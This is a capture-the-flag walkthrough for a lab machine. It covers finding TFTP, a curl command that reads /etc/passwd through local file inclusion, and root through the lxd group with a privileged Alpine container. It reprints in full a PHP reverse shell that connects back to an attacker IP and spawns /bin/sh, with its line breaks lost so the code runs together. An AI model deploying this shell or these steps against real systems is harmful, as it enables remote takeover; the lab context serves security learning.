What service is running on the target machine over UDP?
Answer: tftp
Task 2
What class of vulnerability is the webpage that is hosted on port 80 vulnerable to? Looking on OWASP we ca test for local file inclusion. So we can curl the website. curl 'http://10.129.253.54/?file=/etc/passwd'
Answer: Local File Inclusion
Task 3
What is the default system folder that TFTP uses to store files?
Answer: /var/lib/tftpboot/
Task 4
Which interesting file is located in the web server folder and can be used for Lateral Movement?
Answer: .htpasswd
Task 5
What is the group that user Mike is a part of and can be exploited for Privilege Escalation? This article on HackTricks shows ways we can exploit LXD. Answer: lxd
Task 6
When using an image to exploit a system via containers, we look for a very small distribution. Our favorite for this task is named after mountains. What is that distribution name?
Answer: alpine
Task 7
What flag do we set to the container so that it has root privileges on the host system?
Answer: security.privileged=true
Task 8
If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted?
Answer: /mnt/root
Task 9
Submit user flag
using this PHP Reverse Shell(First result on Google when doing this).
<?phpset_time_limit (0);$VERSION ="1.0";$ip ='10.10.14.82';$port =8008;$chunk_size =1400;$write_a =null;$error_a =null;$shell ='uname -a; w; id; /bin/sh -i';$daemon =0;$debug =0;//// Daemonise ourself if possible to avoid zombies later//// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies. Worth a try...if (function_exists('pcntl_fork')) {// Fork and have the parent process exit $pid =pcntl_fork();if ($pid ==-1) {printit("ERROR: Can't fork");exit(1); }if ($pid) {exit(0); // Parent exits }// Make the current process a session leader// Will only succeed if we forkedif (posix_setsid()==-1) {printit("Error: Can't setsid()");exit(1); } $daemon =1;} else {printit("WARNING: Failed to daemonise. This is quite common and not fatal.");}// Change to a safe directorychdir("/");// Remove any umask we inheritedumask(0);//// Do the reverse shell...//// Open reverse connection$sock =fsockopen($ip, $port, $errno, $errstr,30);if (!$sock) {printit("$errstr ($errno)");exit(1);}// Spawn shell process$descriptorspec =array(0=>array("pipe","r"),// stdin is a pipe that the child will read from1=>array("pipe","w"),// stdout is a pipe that the child will write to2=>array("pipe","w") // stderr is a pipe that the child will write to);$process =proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit("ERROR: Can't spawn shell");exit(1);}// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0],0);stream_set_blocking($pipes[1],0);stream_set_blocking($pipes[2],0);stream_set_blocking($sock,0);printit("Successfully opened reverse shell to $ip:$port");while (1) {// Check for end of TCP connectionif (feof($sock)) {printit("ERROR: Shell connection terminated");break; }// Check for end of STDOUTif (feof($pipes[1])) {printit("ERROR: Shell process terminated");break; }// Wait until a command is end down $sock, or some// command output is available on STDOUT or STDERR $read_a =array($sock, $pipes[1], $pipes[2]); $num_changed_sockets =stream_select($read_a, $write_a, $error_a,null);// If we can read from the TCP socket, send// data to process's STDINif (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ"); $input =fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");fwrite($pipes[0], $input); }// If we can read from the process's STDOUT// send data down tcp connectionif (in_array($pipes[1], $read_a)) {if ($debug) printit("STDOUT READ"); $input =fread($pipes[1], $chunk_size);if ($debug) printit("STDOUT: $input");fwrite($sock, $input); }// If we can read from the process's STDERR// send data down tcp connectionif (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ"); $input =fread($pipes[2], $chunk_size);if ($debug) printit("STDERR: $input");fwrite($sock, $input); }}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)functionprintit ($string) {if (!$daemon) {print"$string\n"; }}?>
